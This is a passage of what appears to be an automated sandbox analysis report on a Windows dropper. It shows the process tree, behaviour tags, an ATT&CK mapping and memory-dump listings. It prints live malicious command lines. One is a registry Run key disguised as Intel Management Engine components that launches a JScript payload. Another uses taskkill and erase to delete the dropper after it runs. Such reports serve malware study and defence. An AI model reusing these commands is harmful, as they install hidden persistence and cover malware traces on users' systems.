        reg.exe add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Intel Management Engine Components 537220114" /t REG_SZ /d "wscript.exe /t:30 /nologo /e:jscript \"C:\ProgramData\Intel\Intel(R) Management Engine Components\Intel MEC 1582787339\" \"C:\ProgramData\Intel\Intel(R) Management Engine Components\" 1516268563" /f
        11⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:7068
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{nXa0-XLbu0-rMHG-kzyWB}\26650786599.exe" /us
        5⤵
        Loads dropped DLL
        
        PID:2628
      - C:\Users\Admin\AppData\Local\Temp\{nXa0-XLbu0-rMHG-kzyWB}\26650786599.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{nXa0-XLbu0-rMHG-kzyWB}\26650786599.exe" /us
        6⤵
        Executes dropped EXE
        Checks processor information in registry
        
        PID:2656
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
        5⤵
        Loads dropped DLL
        
        PID:2688
      - C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
        
        "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2716
        
        C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
        
        "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
        7⤵
        
        PID:3016
        
        C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
        
        "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
        7⤵
        
        PID:3024
        
        C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
        
        "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        
        PID:3032
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "4k3pJuomY9ufA5v.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\yXIKetvm\4k3pJuomY9ufA5v.exe" & exit
        5⤵
        
        PID:2728
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "4k3pJuomY9ufA5v.exe" /f
        6⤵
        Kills process with taskkill
        
        PID:2784
  - - C:\Users\Admin\AppData\Local\Temp\0DYdR4H3\5TbjRG.exe
      C:\Users\Admin\AppData\Local\Temp\0DYdR4H3\5TbjRG.exe /qn CAMPAIGN="642"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Enumerates connected drives
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:1268
    - - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=642 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\0DYdR4H3\5TbjRG.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\0DYdR4H3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630358070 /qn CAMPAIGN=""642"" " CAMPAIGN="642"
        5⤵
        
        PID:612

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:516
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A35715968138D71C0E32CEFC29A8C186 C
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:1564
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 910E63D04E8C3CA46E1B86B5D376CF27
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:288
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:1892
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 4DB19FDB51598E22DC03F446E1AE2098 M Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:1648

C:\Windows\system32\taskeng.exe
taskeng.exe {7560EE41-CABF-4C88-A557-C55F67C5C54C} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:1584
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
  2⤵
  - Executes dropped EXE
  PID:544
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
  2⤵
  - Executes dropped EXE
  PID:2588
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
  2⤵
  - Executes dropped EXE
  PID:2620
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
  2⤵
  - Executes dropped EXE
  PID:2152
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
  2⤵
  - Executes dropped EXE
  PID:4044
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
  2⤵
  - Executes dropped EXE
  PID:4220

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/516-96-0x000007FEFB7B1000-0x000007FEFB7B3000-memory.dmp

Filesize
8KB

Download
memory/1268-92-0x0000000074491000-0x0000000074493000-memory.dmp

Filesize
8KB

Download
memory/1268-93-0x0000000000260000-0x00000000002B7000-memory.dmp

Filesize
348KB

Download
memory/1360-89-0x0000000000400000-0x0000000002B5E000-memory.dmp

Filesize
39.4MB

Download
memory/1360-88-0x0000000002B60000-0x0000000002BA8000-memory.dmp

Filesize
288KB

Download
memory/1748-79-0x0000000004530000-0x0000000004532000-memory.dmp

Filesize
8KB

Download
memory/1748-76-0x0000000000400000-0x00000000019C2000-memory.dmp

Filesize
21.8MB

Download
memory/1748-77-0x00000000003E0000-0x00000000003E1000-memory.dmp

Filesize
4KB

Download
memory/1864-66-0x00000000003D0000-0x00000000003D1000-memory.dmp

Filesize
4KB

Download
memory/1864-70-0x00000000743F1000-0x00000000743F3000-memory.dmp

Filesize
8KB

Download
memory/1988-59-0x0000000075511000-0x0000000075513000-memory.dmp

Filesize
8KB

Download
memory/1988-65-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/2436-166-0x0000000006900000-0x0000000006901000-memory.dmp

Filesize
4KB

Download
memory/2436-169-0x000000000C600000-0x000000000C601000-memory.dmp

Filesize
4KB

Download
memory/2436-170-0x0000000026400000-0x0000000026401000-memory.dmp

Filesize
4KB

Download
memory/2436-167-0x000000003EF00000-0x000000003EF01000-memory.dmp

Filesize
4KB

Download
memory/2436-165-0x0000000007000000-0x0000000007001000-memory.dmp

Filesize
4KB

Download
memory/2436-168-0x000000000CC00000-0x000000000CC01000-memory.dmp

Filesize
4KB

Download
memory/2656-182-0x0000000004500000-0x00000000045EB000-memory.dmp

Filesize
940KB

Download
memory/2656-183-0x0000000000400000-0x0000000002BBA000-memory.dmp

Filesize
39.7MB

Download
memory/2716-189-0x0000000000770000-0x000000000078C000-memory.dmp

Filesize
112KB

Download
memory/2716-188-0x00000000043B0000-0x00000000043B1000-memory.dmp

Filesize
4KB

Download
memory/2716-185-0x0000000000B10000-0x0000000000B11000-memory.dmp

Filesize
4KB

Download
memory/3032-196-0x0000000002320000-0x0000000002321000-memory.dmp

Filesize
4KB

Download
memory/3032-204-0x0000000002325000-0x0000000002336000-memory.dmp

Filesize
68KB

Download
memory/3032-194-0x0000000000750000-0x0000000000751000-memory.dmp

Filesize
4KB

Download
memory/3032-192-0x0000000000400000-0x000000000046C000-memory.dmp

Filesize
432KB

Download
memory/3032-190-0x0000000000400000-0x000000000046C000-memory.dmp

Filesize
432KB

Download